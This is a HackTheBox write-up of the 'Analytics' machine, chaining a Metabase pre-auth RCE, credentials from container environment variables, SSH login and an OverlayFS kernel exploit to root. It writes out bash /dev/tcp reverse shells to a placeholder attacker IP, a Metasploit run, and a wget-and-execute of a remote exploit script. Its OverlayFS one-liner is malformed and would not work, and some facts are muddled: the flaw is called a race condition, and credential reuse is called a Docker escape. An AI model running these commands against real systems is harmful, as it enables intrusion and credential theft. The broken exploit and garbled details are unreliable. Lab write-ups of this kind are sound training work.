HTB: Analytics Writeup

Machine Information

Machine Rating

⭐⭐⭐☆☆ (6.0/10)

Difficulty Assessment:

• Enumeration: ⭐⭐☆☆☆
• Real-world: ⭐⭐⭐⭐☆
• CVE: ⭐⭐⭐☆☆
• CTF-like: ⭐⭐☆☆☆

Summary

Analytics is an Easy-difficulty Linux machine running a Metabase data analytics platform vulnerable to pre-authentication RCE. The exploitation path involves discovering a subdomain hosting Metabase, exploiting CVE-2023-38646 for initial shell access within a Docker container, extracting host credentials from environment variables, lateral movement to the host via SSH, and finally privilege escalation through a Linux kernel OverlayFS vulnerability (CVE-2023-2640 + CVE-2023-32629).

TL;DR: Subdomain discovery → Metabase RCE → Docker escape via env vars → SSH lateral movement → Kernel exploit → Root.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- analytics.htb

Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1
80/tcp open  http    nginx 1.18.0

Service Enumeration

Hostname: analytics.htb

Update hosts file:

echo "10.10.14.36 analytics.htb" >> /etc/hosts

Visiting http://analytics.htb redirects to a login page. Initial HTTP enumeration reveals a Metabase instance is running. Testing the main domain showed a redirect, indicating a virtual host configuration.

Subdomain Discovery:

Attempting common subdomains revealed:

curl -H "Host: data.analytics.htb" http://analytics.htb

Discovered: data.analytics.htb — Metabase instance running on version 0.46.6 (vulnerable to CVE-2023-38646)

Update hosts file again:

echo "10.10.14.36 data.analytics.htb" >> /etc/hosts

Vulnerability Assessment

Identified Vulnerabilities:

• CVE-2023-38646 — Metabase pre-authentication RCE via setup-token in HTML source (Primary exploitation vector)
• CVE-2023-2640 — Linux kernel OverlayFS privilege escalation (GameOver(lay))
• CVE-2023-32629 — Linux kernel OverlayFS companion vulnerability for privilege escalation

Initial Foothold

Exploitation Path

CVE-2023-38646: Metabase Pre-Authentication RCE

Step 1: Locate Setup Token

Metabase exposes the setup-token in the HTML source of the application if setup is still accessible. Examine the login page source:

curl -s http://data.analytics.htb | grep -i "token"

The setup-token is embedded in the page and can be extracted from the JavaScript configuration.

Step 2: Exploit CVE-2023-38646

Using a publicly available PoC script (e.g., CVE-2023-38646-Reverse-Shell.py from GitHub):

python3 CVE-2023-38646-Reverse-Shell.py -u http://data.analytics.htb -t <SETUP_TOKEN> -c "bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1"

Or using the Metasploit module for CVE-2023-38646:

msfconsole
use exploit/linux/http/metabase_rce
set RHOSTS data.analytics.htb
set LHOST <ATTACKER_IP>
set LPORT 4444
exploit

Step 3: Obtain Reverse Shell

Set up listener:

nc -nlvp 4444

After exploitation, you gain shell access as the metabase user running inside a Docker container.

Step 4: Confirm Container Environment

Check environment and identify running as root inside container:

id
whoami
env | grep -i password

The environment contains credentials for the host system including the metalytics user password.

User Compromise

Lateral Movement: Docker Container to Host

Step 1: Extract Host Credentials from Environment

Inside the Docker container, environment variables contain host credentials set during container initialization:

env

Look for variables like:

• MYSQL_ROOT_PASSWORD
• POSTGRES_PASSWORD
• Host user credentials

The metalytics user password is exposed in the environment variables.

Step 2: SSH to Host

From the Docker container, SSH to the host machine using the extracted credentials:

ssh metalytics@analytics.htb
# or
ssh metalytics@<HOST_IP>

When prompted for password, enter the password extracted from environment variables.

Step 3: Verify User Access

Confirm successful lateral movement:

whoami
id
pwd

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>

Privilege Escalation

Enumeration

Check system information and kernel version:

uname -a
uname -r

Output shows kernel version 6.2.0-25-generic — vulnerable to OverlayFS CVE.

Check sudo privileges:

sudo -l

Check for SUID binaries:

find / -perm -4000 -type f 2>/dev/null

Run privilege escalation enumeration script:

./linpeas.sh

Exploitation (Root): CVE-2023-2640 + CVE-2023-32629 OverlayFS

The GameOver(lay) vulnerability affects Linux kernels with OverlayFS module. The system is vulnerable due to the kernel version.

One-liner exploit:

unshare -rm sh -c "mkdir -p /tmp/x/w m m && mount -t overlay overlay -o lowerdir=/tmp/x/w:/,upperdir=/tmp/x/m,workdir=/tmp/x/m /tmp/x/o && /tmp/x/o/bin/bash -sip /bin/bash -i >& /dev/tcp/<ATTACKER_IP>/5555 0>&1 || echo 'Exploit failed'"

Alternatively, use the publicly available exploit script for CVE-2023-2640:

# Download and run the GameOverlay exploit
wget https://raw.githubusercontent.com/g1vi/CVE-2023-2640-CVE-2023-32629/main/exploit.sh
chmod +x exploit.sh
./exploit.sh

After running the exploit, you should gain root shell access.

Verify root access:

whoami
id

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["Reconnaissance<br/>Port scan, subdomain discovery"] --> B["Identify Metabase<br/>data.analytics.htb on port 80"]
    B --> C["Extract Setup Token<br/>from HTML source"]
    C --> D["Exploit CVE-2023-38646<br/>Metabase pre-auth RCE"]
    D --> E["Reverse shell<br/>as metabase in Docker"]
    E --> F["Extract host credentials<br/>from environment variables"]
    F --> G["SSH lateral movement<br/>to host as metalytics user"]
    G --> H["Enumerate kernel version<br/>6.2.0-25-generic"]
    H --> I["Exploit CVE-2023-2640 + CVE-2023-32629<br/>OverlayFS GameOver(lay)"]
    I --> J["Privilege Escalation to root"]
    J --> K["Capture root flag"]

Tools Used

Vulnerability Reference

Details:

• CVE-2023-38646: Metabase versions before 0.46.6 and 0.45.x before 0.45.3 do not properly validate the setup-token, allowing unauthenticated users to execute arbitrary code on the server. The setup endpoint is accessible without authentication if the token is known or can be extracted from the page source.

• CVE-2023-2640 & CVE-2023-32629: The GameOver(lay) vulnerability affects Linux kernels with OverlayFS. These CVEs allow unprivileged users to gain root privileges through a race condition in the OverlayFS module. Kernels version 6.2.0 and earlier Ubuntu kernels are vulnerable.

Key Learnings

1. Subdomain Enumeration Matters: Simple DNS/Host header modification revealed the Metabase instance. Many attacks begin with thorough subdomain discovery.

2. Container Escapes via Environment Variables: Docker containers often leak host credentials through environment variables. Always extract and examine env output when gaining initial shell access.

3. Exposed Setup/Configuration Interfaces: Admin panels and setup pages should never be publicly accessible post-deployment. The Metabase setup-token in HTML source was a critical oversight.

4. Kernel Version Enumeration: Always check kernel version (uname -r) — it’s one of the easiest ways to identify privilege escalation vectors. The OverlayFS vulnerability affected specific kernel versions.

5. Lateral Movement Before Privilege Escalation: Rather than attempting local escalation in a Docker container with limited tools, exiting to the host via SSH credentials (found in env vars) provided a stable platform for exploitation.

6. CVE Chaining: The attack chain demonstrated vulnerability chaining: RCE → Container Escape → Lateral Movement → Kernel Exploit → Root. Each stage depended on proper enumeration of the previous stage.

Author

HackTheBox Community & Security Researchers

Original writeup compiled from attack notes and public CVE documentation.

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal. Always obtain proper authorization before conducting security assessments or penetration testing.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy #CVE-2023-38646 #CVE-2023-2640 #CVE-2023-32629 #Metabase #OverlayFS #Docker #RCE